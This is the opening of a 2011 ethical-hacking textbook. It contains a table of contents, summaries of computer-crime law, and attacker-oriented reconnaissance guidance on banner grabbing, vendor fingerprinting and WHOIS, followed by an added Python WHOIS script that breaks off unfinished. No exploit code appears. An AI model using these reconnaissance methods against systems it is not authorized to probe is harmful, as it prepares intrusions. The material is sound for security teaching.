HACKER TECHNIQUES, EXPLOIT AND INCIDENT HANDLING
Defensia
2011
Rafel Ivgi
This book introduces the world of hacking and involves
the reader with the current players, the rules of the
game, motivation and new trends.
1 | P a g e
TABLE OF CONTENTS
Introduction to Ethical Hacking - Problem Definition – Why? ........................................................ 11
How does a hacker see the world? ........................................................................................... 11
Hacking Laws - www.usdoj.gov..................................................................................................... 12
United States of America: Securely Protect Yourself against - Cyber Trespass Act (SPY ACT). 12
U.S. Federal Laws....................................................................................................................... 13
Section 1029.......................................................................................................................... 13
Section 1030.......................................................................................................................... 14
18 U.S.C. §1362...................................................................................................................... 17
18 U.S.C. §2318 - Trafficking in counterfeit…........................................................................ 18
18 U.S.C. §2320 - Trademark Offenses Trafficking in counterfeit goods or services ............ 18
18 U.S.C. §1831 - Trade Secret Offenses Economic espionage Law...................................... 18
47 U.S.C. §605 - Unauthorized publication or use of communications ................................ 18
Foot-printing visiting Reconnaissance........................................................................................... 20
Foot-Printing each Service Server Software Name and Version............................................... 20
Foot-Printing HTTP Servers.................................................................................................... 20
Foot-Printing FTP Servers...................................................................................................... 23
Foot-Printing Telnet Servers.................................................................................................. 23
Fingerprinting VoIP Servers:...................................................................................................... 24
Fingerprinting Products of Specific Vendors:............................................................................ 24
WHOIS ....................................................................................................................................... 28
Google Hacking - What is Google hacking? ....................................................................................... 32
Finding Old Vulnerable Web Pages / Fast & Passive Web Crawling/Spidering......................... 32
Finding Login Interfaces......................................................................................................... 33
Finding Exploitable Vulnerable Web Systems by Signature...................................................... 34
Choosing a public exploit:...................................................................................................... 34
Finding a vulnerable website .................................................................................................. 35
Verifying the vulnerability exists........................................................................................... 37
Exploiting the Vulnerability ................................................................................................... 38
Opening a free hosting account ............................................................................................ 38
Finding Cameras........................................................................................................................ 41
Finding Password Files............................................................................................................... 43
Scanning - Scanning Definition......................................................................................................... 46
Enumeration - Overview of System Hacking Cycle.......................................................................... 48
Enumerating the allowed HTTP Methods on a Web Server:..................................................... 48
Enumerating Usernames Using Google..................................................................................... 49
Exposed Configuration Files .................................................................................................. 49
Company Email Addresses: ................................................................................................... 50
SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR)..................................................................... 51
Using the SMTP VRFY Command........................................................................................... 51
Using the SMTP EXPN Command .......................................................................................... 52
Using the SMTP RCPT TO Command ..................................................................................... 53
Non-Delivery Response (NDR)............................................................................................... 54
POP3 Enumeration .................................................................................................................... 54
Private User Directories............................................................................................................. 56
Apache User Enumeration..................................................................................................... 56
WordPress Authors Template User Enumeration Vulnerability ........................................... 56
FTP............................................................................................................................................. 58
CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd) ................................ 58
FTP Server Authentication Delay Username Enumeration Vulnerability (Example: ProFTPD) ..... 58
Telnet......................................................................................................................................... 58
Telnet Server User Field Account Enumeration (Example: Cisco Aironet)............................ 58
Web Server Pre-Login – HTTP Response based enumeration (Example: Lotus Domino) .......... 58
Error Message User Enumeration:............................................................................................ 59
NetBIOS User Enumeration....................................................................................................... 59
McAfee Foundstone SuperScan 4: ........................................................................................ 61
NetBIOS Enumerator............................................................................................................. 62
GFI LANguard.......................................................................................................................... 63
SNMP Enumeration................................................................................................................... 63
DNS Enumeration...................................................................................................................... 64
Dictionary Based DNS Enumeration...................................................................................... 65
Brute Forcing DNS Sub-Domains............................................................................................... 65
VoIP User Enumeration ............................................................................................................. 66
Enumerating Extensions:....................................................................................................... 66
Enumerate Usernames: (Example: Inter Asterisk Exchange protocol) ................................. 66
Citrix Published Applications Remote Enumeration ................................................................. 67
System Hacking Part 1- Cracking Password................................................................................... 69
Brute Forcing Passwords – Telnet:............................................................................................ 69
Cracking Accounts Using Hydra................................................................................................. 69
Cracking Accounts Using Medusa: ............................................................................................ 70
Brute Forcing Check Point Client Authentication Remote Service............................................ 71
Brute Forcing Citrix ICA Servers................................................................................................. 71
Trojans and Backdoors - Effect on Business.................................................................................... 76
Auto Dialers............................................................................................................................... 77
FraudWare................................................................................................................................. 77
Keylogger................................................................................................................................... 78
Spyware & Browser Trojans ...................................................................................................... 79
Trojans....................................................................................................................................... 79
Password Stealers...................................................................................................................... 79
RansomWare............................................................................................................................. 80
Viruses and Worms - Virus History.................................................................................................. 82
Local Replicating Viruses ........................................................................................................... 82
Worms....................................................................................................................................... 83
Antivirus..................................................................................................................................... 83
Packers/Crypters – Bypassing Anti-Viruses............................................................................... 84
Netcat - Original – Less Than Packed .................................................................................... 85
Netcat * RDG PolyPack v1.1 .................................................................................................. 88
Poison Ivy............................................................................................................................... 89
SCPack 1.1.............................................................................................................................. 89
Alternate EXE Packer............................................................................................................. 91
Alternate EXE Packer............................................................................................................. 92
Poison Ivy * MEW.................................................................................................................. 93
Poison Ivy * ACprotect .......................................................................................................... 94
sixxpack v2.2Eng.................................................................................................................... 95
DotFuscator............................................................................................................................... 95
Sniffers - Definition – Sniffing.......................................................................................................... 98
Man in the Middle..................................................................................................................... 98
Hub vs. Switch ........................................................................................................................... 98
MAC Spoofing............................................................................................................................ 99
MAC Flooding / CAM Table Overflow...................................................................................... 100
Description .......................................................................................................................... 100
MAC Flooding ...................................................................................................................... 100
Port Stealing ............................................................................................................................ 102
STP mangling ........................................................................................................................... 104
Address Resolution Protocol (ARP) Spoofing .......................................................................... 104
IP Spoofing............................................................................................................................... 105
VLANs ...................................................................................................................................... 106
ICMP Redirect.......................................................................................................................... 107
Public Key Exchanging ............................................................................................................. 109
Command Injection ................................................................................................................. 110
Malicious Code Injection......................................................................................................... 110
Downgrade Attacks - SSH V2 to V1 ......................................................................................... 110
Downgrade Attacks - SSH V2 to V1...................................................................................... 110
Downgrade Attacks - IPSEC Failure ......................................................................................... 110
Downgrade Attacks – PPTP ..................................................................................................... 111
PPTP:.................................................................................................................................... 111
Social Engineering ....................................................................................................................... 112
Email Spoofing......................................................................................................................... 112
Social Engineering Tool-Kit...................................................................................................... 114
Tab-Nabbing ............................................................................................................................ 119
ClickJacking / Interface Spoofing............................................................................................. 119
Phishing ....................................................................................................................................... 121
Diversion theft......................................................................................................................... 121
Quid pro quo ........................................................................................................................... 122
Social Engineering - Source Validation.................................................................................... 122
Pretexting – Collecting Names, Emails & Phone Numbers ..................................................... 123
Pretexting – Collecting Names & Roles ................................................................................... 124
Target and Attack .................................................................................................................... 125
Social Engineering by Phone ................................................................................................... 126
Dumpster Diving...................................................................................................................... 127
On-Line Social Engineering...................................................................................................... 127
Persuasion ............................................................................................................................... 128
Reverse Social Engineering...................................................................................................... 129
Hacking Email Accounts............................................................................................................... 130
Key-logging: The Easiest Way! ................................................................................................ 130
Phishing: The Difficult Way ..................................................................................................... 130
Common Myths and Scams Associated with Email Hacking ................................................... 130
Denial-of-Service - Real World Scenario of D.o.S Attacks ............................................................. 132
Ping of Death........................................................................................................................... 132
Permanent denial-of-service attacks – PDOS.......................................................................... 132
IP Spoofing............................................................................................................................... 133
Land Attack.............................................................................................................................. 133
SYN Flood................................................................................................................................. 134
SYN Flood + IP Spoofing........................................................................................................... 136
Reflected attack: Source IP Spoofing + SYN Sent .................................................................... 137
Distributed attack – DDOS....................................................................................................... 138
Amplification/Smurf attack ..................................................................................................... 140
Session Hi-Jacking - What is Session Hi-Jacking?......................................................................... 142
Hacking Web Servers - How Web Servers Work ........................................................................... 148
Components of a generic web application system ................................................................. 148
URL mappings to the web application system ........................................................................ 149
Flowchart for a one-way web hack ......................................................................................... 150
Finding the entry point............................................................................................................ 151
Exploiting poorly validated input parameters..................................................................... 152
Exploiting SQL injection....................................................................................................... 152
Invoking the command interpreter..................................................................................... 153
Posting commands to CMD.EXE .......................................................................................... 153
Posting commands to /bin/sh ............................................................................................. 154
Automating the POST process............................................................................................. 155
Output of post_cmd.pl ........................................................................................................ 155
Web based command prompt............................................................................................. 157
Perl - perl_shell.cgi .............................................................................................................. 157
ASP - cmdasp.asp................................................................................................................. 158
PHP - sys.php....................................................................................................................... 160
JSP - cmdexec.jsp................................................................................................................. 160
Installing the Web based command prompt....................................................................... 161
Re-creating arbitrary binary files......................................................................................... 162
File uploader............................................................................................................................ 162
ASP - upload.asp and upload.inc ......................................................................................... 162
Perl - upload.cgi................................................................................................................... 163
PHP - upload.php................................................................................................................. 164
One-Way Privilege Escalation.................................................................................................. 165
Web Application Vulnerabilities - Web Application Setup............................................................ 169
XSS – Cross-Site-Scripting........................................................................................................ 169
Introduction......................................................................................................................... 169
Reflected XSS (Type I).......................................................................................................... 169
Permanent (Stored) XSS ...................................................................................................... 170
DOM XSS.............................................................................................................................. 170
XSS-Shell .............................................................................................................................. 170
XSS Worms........................................................................................................................... 171
The Future of SPAM............................................................................................................. 171
D.o.S attacks........................................................................................................................ 172
Information Gathering......................................................................................................... 173
Automated exploiting bots.................................................................................................. 173
Malware Script Detector ..................................................................................................... 174
Cross Site Request Forgery (CSRF/XSRF/Session Riding)......................................................... 174
Introduction......................................................................................................................... 174
The risks and common uses ................................................................................................ 175
Tokens vs. Personal Information as a solution for CSRF ..................................................... 176
Open/Un-Validated Site Redirection / Cross Domain Redirect............................................... 177
Common uses and Risks ...................................................................................................... 178
Validating Redirects and Forwards...................................................................................... 179
SQL-injection - What is SQL Injection? ........................................................................................ 180
Introduction............................................................................................................................. 180
The Practice............................................................................................................................. 181
Error Based SQL Injection.................................................................................................... 181
Union Based SQL Injection .................................................................................................. 181
Taking Over the Machine .................................................................................................... 182
SQL injection as a lead to other vulnerabilities....................................................................... 183
SQL injection Automated tools................................................................................................ 183
SQL injection Prevention......................................................................................................... 185
Web-Based Password Cracking Techniques - Authentication – Definition.................................. 186
Hacking Wireless Networks......................................................................................................... 193
Introduction............................................................................................................................. 193
Wireless LAN Overview ........................................................................................................... 193
Stations and Access Points .................................................................................................. 194
Channels .............................................................................................................................. 194
WEP ..................................................................................................................................... 194
Infrastructure and Ad Hoc Modes....................................................................................... 194
Frames................................................................................................................................. 195
Authentication..................................................................................................................... 195
Association .......................................................................................................................... 196
Wireless Network Sniffing....................................................................................................... 197
Passive Scanning.................................................................................................................. 197
Detection of SSID................................................................................................................. 198
Collecting the MAC Addresses............................................................................................. 198
Collecting the Frames for Cracking WEP ............................................................................. 199
Detection of the Sniffers ..................................................................................................... 200
Wireless Spoofing.................................................................................................................... 200
MAC Address Spoofing........................................................................................................ 200
IP spoofing........................................................................................................................... 200
Frame Spoofing.................................................................................................................... 201
Wireless Network Probing....................................................................................................... 201
Detection of SSID................................................................................................................. 202
Detection of Probing ........................................................................................................... 202
AP Weaknesses........................................................................................................................ 202
Configuration....................................................................................................................... 203
Defeating MAC Filtering ...................................................................................................... 203
Rogue AP ............................................................................................................................. 203
Trojan AP ............................................................................................................................. 203
Equipment Flaws ................................................................................................................. 203
Denial of Service...................................................................................................................... 204
Jamming the Air Waves....................................................................................................... 204
Flooding with Associations.................................................................................................. 204
Forged Disassociation ........................................................................................................... 205
Forged De-Authentication................................................................................................... 205
Power Saving ....................................................................................................................... 205
Man-in-the-Middle Attacks ..................................................................................................... 205
Wireless MITM .................................................................................................................... 206
ARP Poisoning...................................................................................................................... 206
Session Hijacking ................................................................................................................. 207
War Driving.............................................................................................................................. 207
War chalking........................................................................................................................ 208
Typical Equipment............................................................................................................... 208
Wireless Security Best Practices.............................................................................................. 209
Location of the APs.............................................................................................................. 209
Proper Configuration........................................................................................................... 209
Secure Protocols.................................................................................................................. 210
Wireless IDS......................................................................................................................... 210
Wireless Auditing................................................................................................................. 211
Newer Standards and Protocols.......................................................................................... 211
Software Tools..................................................................................................................... 211
Conclusion ............................................................................................................................... 212
Physical Security.......................................................................................................................... 213
Dumpster diving ...................................................................................................................... 213
Overt document stealing......................................................................................................... 213
CRT vs. LCD vs. LED – Remote Screen Eavesdropping............................................................. 213
Ethernet vs. Optic Fibers ......................................................................................................... 214
Linux Hacking - Why Linux?......................................................................................................... 217
Linux/Apache privilege escalation........................................................................................... 217
Uploading the UNIX attack tools............................................................................................. 217
ptrace1.c.............................................................................................................................. 217
Evading IDS, Firewalls and Detecting Honey Pots Introduction to Intrusion.............................. 223
Introduction............................................................................................................................. 223
Honeypots versus steganography ........................................................................................... 223
Tools .................................................................................................................................... 224
User Mode Linux (UML)....................................................................................................... 224
VMware ............................................................................................................................... 227
Detecting additional lines of defense: chroot and jails....................................................... 229
Practical examples (continued) ............................................................................................... 230
Sebek-based Honeypots...................................................................................................... 230
Snort_inline ......................................................................................................................... 231
Fake AP ................................................................................................................................ 232
Bait and Switch Honeypots.................................................................................................. 232
Summary.................................................................................................................................. 233
Conclusion ............................................................................................................................... 234
Buffer Overflows: Why are Programs/Applications Vulnerable?.................................................... 235
Verify the bug.......................................................................................................................... 235
Verify the bug – and see if it could be interesting .................................................................. 236
Before we proceed – some theory.......................................................................................... 236
Process Memory.................................................................................................................. 237
The Stack ............................................................................................................................. 239
The debugger....................................................................................................................... 247
Determining the buffer size to write exactly into EIP ......................................................... 251
Find memory space to host the shellcode .......................................................................... 255
Jump to the shellcode in a reliable way .................................................................................. 258
Get shellcode and finalize the exploit ..................................................................................... 263
What if you want to do something else than launching calc? ................................................ 265
Heap Overflows....................................................................................................................... 270
Exploiting Heap Overflows .................................................................................................. 271
Off-By-One............................................................................................................................... 275
Signed vs. Un-Signed ............................................................................................................... 275
Memory Protection Mechanisms............................................................................................ 276
Security Cookie (Canary) ..................................................................................................... 276
SafeSEH................................................................................................................................ 277
Address Space Layout Randomization (ASLR) ..................................................................... 278
NX (No eXecute – Hardware DEP)....................................................................................... 279
NX – In Sun VM Environment.............................................................................................. 280
NX – Process Support .......................................................................................................... 281
Cryptography............................................................................................................................... 282
Hash......................................................................................................................................... 282
MD5 HASH “Reverse”.............................................................................................................. 282
Rainbow Tables ....................................................................................................................... 284
Introduction to Ethical Hacking: Problem Definition – Why?
In the past, hackers were kids who hacked in order to prove themselves the smartest and the
best technologists in their community. After succeeding in remotely penetrating an
organization and gaining control over one of its machines, they would usually stop there and
keep the vulnerability information to themselves or within their close circle.
Today, hackers are people of all ages, motivated mostly by money. Where in the past a White-Hat
hacker, known as a "Security Researcher", would publish an information security advisory for
free to build a reputation and create new career opportunities, today those security
vulnerabilities are worth tens of thousands of dollars and are sold to private companies.
Like the hacking scene, the cracking scene has also changed. In the past it consisted of a few
famous groups such as Myth, Fair-Light, Divine, Deviance and Paradigm, mostly collections of
teenagers interested in software piracy who believed in creating "a money free world where all
computer games and software are available to the rich and the poor". Today, the cracking scene
has shrunk to its core and most of the crack download portals are run by organized crime, which
deliberately bundles the free cracks with a Trojan downloader, building armies of compromised
machines controlled through a botnet.
How does a hacker see the world?
The world's computer industries work to provide solutions for the needs of normal users. The
solution begins with an initiative or startup venture which is designed by the Chief Architect and
passed down the chain to a product manager, who defines the user needs and the optimal user
experience, and then down to a software developer who implements the defined requirements.
It is important to remember that all of the people in this chain are normal people who share one
mission: creating a specific solution for a user or an organization.
A true hacker is not a user and not just a developer or an architect; he is all of them at once
where the system's security is concerned. The hacker reviews the system and inspects how the
information flows between each level of the system as a whole, from the application level all
the way down to the bits leaving the machine's network interface. For the hacker, the graphical
user interface is just a mask over the underlying truth, which he uncovers using hacking tools.
A system can run in production for years and be used by thousands of normal and advanced
users without anyone noticing an obvious security flaw that a hacker picks up in a few minutes.
That is why a system that has not been reviewed by a hacker is not safe from one.
Hacking - Laws www.usdoj.gov
United States of America:
Securely Protect Yourself against - Cyber Trespass Act (SPY ACT)
SEC. 2. PROHIBITION OF [UNFAIR OR] DECEPTIVE ACTS OR PRACTICES RELATING TO SPYWARE.
(a) Prohibition- It is unlawful for any person, who is not the owner or authorized user of a
protected computer, to engage in unfair or deceptive acts or practices that involve any
of the following conduct with respect to the protected computer:
(1) Taking control of the computer by:
(A) Utilizing a computer to send unsolicited information or material from the
computer to other computers
(B) Diverting the Internet browser of the computer, or similar program of the
computer used to access and navigate the Internet:
(i) Without authorization of the owner or authorized user of the
computer; and
(ii) away from the site the user intended to view, to one or more other
Web pages, such that the user is prevented from viewing the content at
the intended web page, unless such diversion is otherwise authorized.
(C) accessing, hijacking, or otherwise using the modem, or Internet connection
or service, for the computer and thereby causing damage to the computer or
causing the owner or authorized user or a third party defrauded by such
conduct to incur charges or other costs for a service that is not authorized by
such owner or authorized user;
(E) Delivering advertisements that a user of the computer cannot close without
undue effort or knowledge by the user or without turning off the computer or
closing all sessions of the Internet browser for the computer.
(2) Modifying settings related to use of the computer or to the computer's
access to or use of the Internet by altering:
(A) the Web page that appears when the owner or authorized user
launches an Internet browser or similar program used to access and
navigate the Internet;
(B) the default provider used to access or search the Internet, or other
existing Internet connections settings;
(3) Collecting personally identifiable information through the use of a
keystroke logging function
(4) Inducing the owner or authorized user of a computer to disclose personally
identifiable information by means of a webpage that:
(A) is substantially similar to a Web page established or provided by
another person; and
(B) misleads the owner or authorized user that such Web page is
provided by such other person
U.S. Federal Laws
• 18 U.S.C §1029. Fraud and Related Activity in Connection with Access Devices
• 18 U.S.C §1030. Fraud and Related Activity in Connection with Computers
• 18 U.S.C §1362. Communication Lines, Stations, or Systems
• 18 U.S.C §2510. et seq. Wire and Electronic Communications Interception and
Interception of Oral Communications
• 18 U.S.C §2701 et seq. Stored Wire and Electronic Communications and Transactional
Records Access
Section 1029
Subsection (a) applies to whoever:
(1) Knowingly and with intent to defraud produces, uses, or traffics in one or more
counterfeit access devices;
(2) knowingly and with intent to defraud traffics in or uses one or more unauthorized
access devices during any one-year period, and by such conduct obtains anything of
value aggregating $1,000 or more during that period;
(3) Knowingly and with intent to defraud possesses fifteen or more devices which are
counterfeit or unauthorized access devices;
(4) Knowingly, and with intent to defraud, produces, traffics in, has control or custody
of, or possesses device-making equipment;
(5) knowingly and with intent to defraud effects transactions, with 1 or more access
devices issued to another person or persons, to receive payment or any other thing of
value during any 1-year period the aggregate value of which is equal to or greater than
$1,000;
(6) Without the authorization of the issuer of the access device, knowingly and with
intent to defraud solicits a person for the purpose of:
(A) Offering an access device; or
(B) Selling information regarding or an application to obtain an access device;
(7) Knowingly and with intent to defraud uses, produces, traffics in, has control or
custody of, or possesses a telecommunications instrument that has been modified or
altered to obtain unauthorized use of telecommunications services;
(8) Knowingly and with intent to defraud uses, produces, traffics in, has control or
custody of, or possesses a scanning receiver;
(9) Knowingly uses, produces, traffics in, has control or custody of, or possesses
hardware or software, knowing it has been configured to insert or modify
telecommunication identifying information associated with or contained in a
telecommunications instrument so that such instrument may be used to obtain
telecommunications service without authorization; or
(10) Without the authorization of the credit card system member or its agent, knowingly
and with intent to defraud causes or arranges for another person to present to the
member or its agent, for payment, 1 or more evidences or records of transactions made
by an access device.
The Punishments:
(A) In the case of an offense that does not occur after a conviction for another offense
under this section:
(i) If the offense is under paragraph (1), (2), (3), (6), (7), or (10) of subsection (a),
a fine under this title or imprisonment for not more than 10 years, or both; and
(ii) If the offense is under paragraph (4), (5), (8), or (9) of subsection (a), a fine
under this title or imprisonment for not more than 15 years, or both;
(B) in the case of an offense that occurs after a conviction for another offense under this
section, a fine under this title or imprisonment for not more than 20 years, or both; and
(C) in either case, forfeiture to the United States of any personal property used or
intended to be used to commit the offense
Section 1030
Subsection (a)(1): having knowingly accessed a computer without authorization or exceeding
authorized access, and by means of such conduct having obtained information that has been
determined by the United States Government pursuant to an Executive order or statute to
require protection against unauthorized disclosure for reasons of national defense or foreign
relations, or any restricted data, as defined in paragraph y of section 11 of the Atomic Energy
Act of 1954, with reason to believe that such information so obtained could be used to the
injury of the United States, or to the advantage of any foreign nation willfully communicates,
delivers, transmits, or causes to be communicated, delivered, or transmitted, or attempts to
communicate, deliver, transmit or cause to be communicated, delivered, or transmitted the
same to any person not entitled to receive it, or willfully retains the same and fails to deliver it
to the officer or employee of the United States entitled to receive it;
(2) Intentionally accesses a computer without authorization or exceeds authorized
access, and thereby obtains:
(A) information contained in a financial record of a financial institution, or of a
card issuer as defined in section 1602(n) of title 15, or contained in a file of a
consumer reporting agency on a consumer, as such terms are defined in the Fair
Credit Reporting Act (15 U.S.C. 1681 et seq.);
(B) Information from any department or agency of the United States; or
(C) Information from any protected computer if the conduct involved an
interstate or foreign communication;
(3) intentionally, without authorization to access any nonpublic computer of a
department or agency of the United States, accesses such a computer of that
department or agency that is exclusively for the use of the Government of the United
States or, in the case of a computer not exclusively for such use, is used by or for the
Government of the United States and such conduct affects that use by or for the
Government of the United States;
(4) knowingly and with intent to defraud, accesses a protected computer without
authorization, or exceeds authorized access, and by means of such conduct furthers the
intended fraud and obtains anything of value, unless the object of the fraud and the
thing obtained consists only of the use of the computer and the value of such use is not
more than $5,000 in any 1-year period;
(5)(A)(i) Knowingly causes the transmission of a program, information, code, or
command, and as a result of such conduct, intentionally causes damage without
authorization, to a protected computer
(ii) intentionally accesses a protected computer without authorization, and as a
result of such conduct, recklessly causes damage; or
(iii) Intentionally access a protected computer without authorization, and as a
result of such conduct, causes damage; and
(5)(B) By conduct described in clause (i), (ii), or (iii) of subparagraph (A), caused (or, in
the case of an attempted offense, would, if completed, have caused):
(i) loss to 1 or more persons during any 1-year period (and, for purposes of an
investigation, prosecution, or other proceeding brought by the United States
only, loss resulting from a related course of conduct affecting 1 or more other
protected computers) aggregating at least $5,000 in value;
(ii) The modification or impairment, or potential modification or impairment, of
the medical examination, diagnosis, treatment, or care of 1 or more individuals;
(iii) physical injury to any person;
(iv) a threat to public health or safety; or
(v) damage affecting a computer system used by or for a government entity in
furtherance of the administration of justice, national defense, or national
security;
(6) Knowingly and with intent to defraud traffics (as defined in section 1029) in any
password or similar information through which a computer may be accessed without
authorization, if:
(A) Such trafficking affects interstate or foreign commerce; or
(B) such computer is used by or for the Government of the United States;
(7) With intent to extort from any person any money or other thing of value, transmits
in interstate or foreign commerce any communication containing any threat to cause
damage to a protected computer;
The Punishments:
(1)(A) a fine under this title or imprisonment for not more than ten years, or both, in the
case of an offense under subsection (a)(1) of this section which does not occur after a
conviction for another offense under this section, or an attempt to commit an offense
punishable under this subparagraph; and
(B) a fine under this title or imprisonment for not more than twenty years, or both, in
the case of an offense under subsection (a)(1) of this section which occurs after a
conviction for another offense under this section, or an attempt to commit an offense
punishable under this subparagraph;
(2)(A) except as provided in subparagraph (B), a fine under this title or imprisonment for
not more than one year, or both, in the case of an offense under subsection (a)(2),
(a)(3), (a)(5)(A)(iii), or (a)(6) of this section which does not occur after a conviction for
another offense under this section, or an attempt to commit an offense punishable
under this subparagraph;
(B) a fine under this title or imprisonment for not more than 5 years, or both, in the case
of an offense under subsection (a)(2), or an attempt to commit an offense punishable
under this subparagraph, if:
• (i) the offense was committed for purposes of commercial advantage or
private financial gain;
• (ii) The offense was committed in furtherance of any criminal or tortious act
in violation of the Constitution or laws of the United States or of any State; or
• (iii) The value of the information obtained exceeds $5,000;
(C) a fine under this title or imprisonment for not more than ten years, or both, in the
case of an offense under subsection (a)(2), (a)(3) or (a)(6) of this section which occurs
after a conviction for another offense under this section, or an attempt to commit an
offense punishable under this subparagraph;
(3)(A) a fine under this title or imprisonment for not more than five years, or both, in the
case of an offense under subsection (a)(4) or (a)(7) of this section which does not occur
after a conviction for another offense under this section, or an attempt to commit an
offense punishable under this subparagraph; and (3)(B) a fine under this title or
imprisonment for not more than ten years, or both, in the case of an offense under
subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section which occurs after a conviction for
another offense under this section, or an attempt to commit an offense punishable
under this subparagraph; and
18 U.S.C. §1362
This law applies when:
• Person willfully injures or destroys any of the works, property, or material of any
means of communication
• Maliciously obstructs, hinders, or delays the transmission of any communication
Punishment:
• A fine or imprisonment for not more than 10 years, or both
18 U.S.C. §2318 - Trafficking in counterfeit…
Label for phone records, copies of computer programs or computer program documentation or
packaging, and copies of motion pictures or other audio visual works, and trafficking in
counterfeit computer program documentation or packaging
This law applies when:
• Person knowingly traffics in a counterfeit label affixed or designed to be affixed
• Intentionally traffics in counterfeit documentation or packaging for a computer
program
Punishment:
• A fine, imprisonment for not more than five years, or both
18 U.S.C. §2320 - Trademark Offenses Trafficking in counterfeit goods or services
This law applies when:
• Person intentionally traffics or attempts to traffic in goods or services
• Knowingly uses a counterfeit mark
Punishment:
• A financial fine of not more than $2,000,000 or imprisoned not more than 10 years, or
both
18 U.S.C. §1831 - Trade Secret Offenses Economic espionage Law
This law applies when:
• Person knowingly steals or without authorization obtains a trade secret
• Without authorization copies or transmits a trade secret
• Receives, buys, or possesses a trade secret
Punishment:
• A financial fine of not more than $10,000,000
47 U.S.C. §605 - Unauthorized publication or use of communications
This law applies when:
• Receiving, assisting in receiving, transmitting, or assisting in transmitting, any
interstate or foreign communication by wire or radio
• Intercepting any radio communication and divulging or publishing the existence,
contents, substance, purport, effect, or meaning of such intercepted communication
to any person
• Scrambling of Public Broadcasting Service programming
Punishment:
• A financial fine of not more than $2,000 or imprisoned for not more than 6 months, or
both
More US Laws:
• Federal Managers Financial Integrity Act of 1982
• The Freedom of Information Act [5 U.S.C.§552]
• Federal Information Security Management Act (FISMA)
• The Privacy Act Of 1974 [5 U.S.C.§552a]
• USA Patriot Act of 2001
• Government Paperwork Elimination Act (GPEA)
European Union (Council of Europe Convention on Cybercrime):
• SUBSTANTIVE CRIMINAL LAW
o Offences against the confidentiality, integrity and availability of computer data
and systems
o illegal Access: Each Party shall adopt such legislative and other measures as may
be necessary to establish as criminal offences under its domestic law, when
committed intentionally, the access to the whole or any part of a computer
system without right
o Illegal Interception
o Data Interference
UK:
• Computer Misuse Act 1990
• Police and Justice Act 2006
Foot-printing: Reconnaissance
Reconnaissance is the step in which the attacker attempts to retrieve as much information as
possible about the target. Reconnaissance is truly an art and is one of the most important stages
of the attack process. It is the hacker's eyes on the playing field; without it he must attack
blindly, reducing the odds of success to a minimum.
Foot-Printing each Service Server Software Name and Version
Foot-Printing HTTP Servers
Getting the server type and disclosing internal information such as the local machine's internal name, its internal IP,
the use of a proxy or a reverse proxy, and so on.
The following error page reveals that the server is Apache Tomcat, the machine's internal name, and that the error
originated in the proxy component:
The following reveals the server’s type and its exact version:
It is possible to change the values of the request parameters, retrieve application errors and
determine the operating system and the local path of the website root folder:
It is possible to identify the server type, the development platform, and installed plugins by
inspecting the returned HTTP headers and the supported HTTP Methods.
Foot-Printing FTP Servers
The server's greeting banner, which contains the server name and version, is exposed by default on most File Transfer
Protocol (FTP) servers. This means that all an attacker has to do is connect to the server and read the greeting; the first
non-empty line usually names the product and its version. For example:
220-Serv-U FTP Server v6.4 for WinSock ready...
220-Welcome to XXXXX, home of Your FTP Server
220-
220 Local time is 13:36:08,
Foot-Printing Telnet Servers
Some telnet servers have banners revealing the name of the vendor, organization or product:
Some servers have a scary warning message which may be used to identify the product or to
recognize remotely that several machines belong to the same organization. For example:
Fingerprinting VoIP Servers:
One of the best-known VoIP security assessment toolkits is SIPVicious; its svmap scanner sends SIP
OPTIONS requests and lists the User-Agent of every device that answers.
Fingerprinting Products of Specific Vendors:
It is possible to identify specific vendors by common texts or messages used by that vendor for
titles, errors and authentication requests. For example, on practically every Cisco product a web
server with "Basic Authentication" will, by default, present the realm "level_15_access":
Using ZenMap (Nmap GUI) to fingerprint the exact type and product version:
Scanning for hosts listening on TCP port 990 finds Check Point firewall VPN portals whose login can be brute-forced:
On some implementations it is reconfigured to listen on port 80:
Scanning for "Check Point Certificate Services" listening on TCP port 18264 has always proved
reliable for finding Check Point firewalls:
Identifying Check Point VPN-1 Edge Portal
WHOIS
Every IP address and domain on the Internet is registered to someone. It is possible to query the
public databases and retrieve information about the owner of an IP or a domain. Querying IPs is
usually called "IP WHOIS" or "Inet-WHOIS" and querying domain names is called "Domain WHOIS"
or "Inic-WHOIS".
An attacker is able to retrieve network information with an information gathering tool such as
Dmitry:
Where the domain (Inic) WHOIS may be masked, private, proxied or censored:
the IP (Inet) WHOIS usually is not:
Or by using a free public online service such as:
http://www.dnsstuff.com
http://www.dnstools.com
http://www.centralops.net
For Example:
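The same lookups can be scripted without Dmitry or a web service, because WHOIS is just a TCP query on port 43 (RFC 3912). The following is an added Python example, not code from the book: it sends the query, parses the free-form "key: value" answer and follows referrals the way a full lookup has to (IANA answers with a "refer:" line, ARIN with "ReferralServer:", the .com/.net registry with "Registrar WHOIS Server:"). The two sample answers embedded below are constructed for the offline demonstration; only the field names come from real registry output.

```python
import re
import socket
import sys

# Fields that hand you off to a more specific server (names as used by IANA,
# ARIN and the gTLD registries). Lower-cased because parse_whois lower-cases keys.
REFERRAL_KEYS = ("refer", "referralserver", "registrar whois server", "whois")

# Constructed sample answers so the referral chain can be exercised offline.
SAMPLE_ANSWERS = {
    "whois.iana.org": (
        "% IANA WHOIS server\n"
        "% for more information on IANA, visit http://www.iana.org\n\n"
        "refer:        whois.ripe.net\n\n"
        "inetnum:      192.0.0.0 - 192.255.255.255\n"
        "organisation: Administered by RIPE NCC\n"
    ),
    "whois.ripe.net": (
        "% This is the RIPE Database query service.\n\n"
        "inetnum:        192.0.2.0 - 192.0.2.255\n"
        "netname:        TEST-NET-1\n"
        "descr:          Documentation prefix (constructed sample)\n"
        "org:            ORG-EXAMPLE1-RIPE\n"
    ),
}


def parse_whois(text):
    """Turn 'key: value' lines into {key: [values]}; RFC 3912 defines no format,
    so comment lines (%, #) and blank lines are skipped and repeated keys kept."""
    records = {}
    for line in text.splitlines():
        line = line.rstrip()
        if not line or line.startswith(("%", "#", ">>>")):
            continue
        key, sep, value = line.partition(":")
        if sep:
            records.setdefault(key.strip().lower(), []).append(value.strip())
    return records


def referral_server(records):
    """Next server to ask, or None if this answer is authoritative."""
    for key in REFERRAL_KEYS:
        for value in records.get(key, []):
            host = re.sub(r"^whois://", "", value).strip().rstrip("/")  # ARIN style
            if host and host.lower() != "n/a":
                return host
    return None


def whois_query(server, query, port=43, timeout=10):
    """One RFC 3912 exchange: send the query plus CRLF, read until the server closes."""
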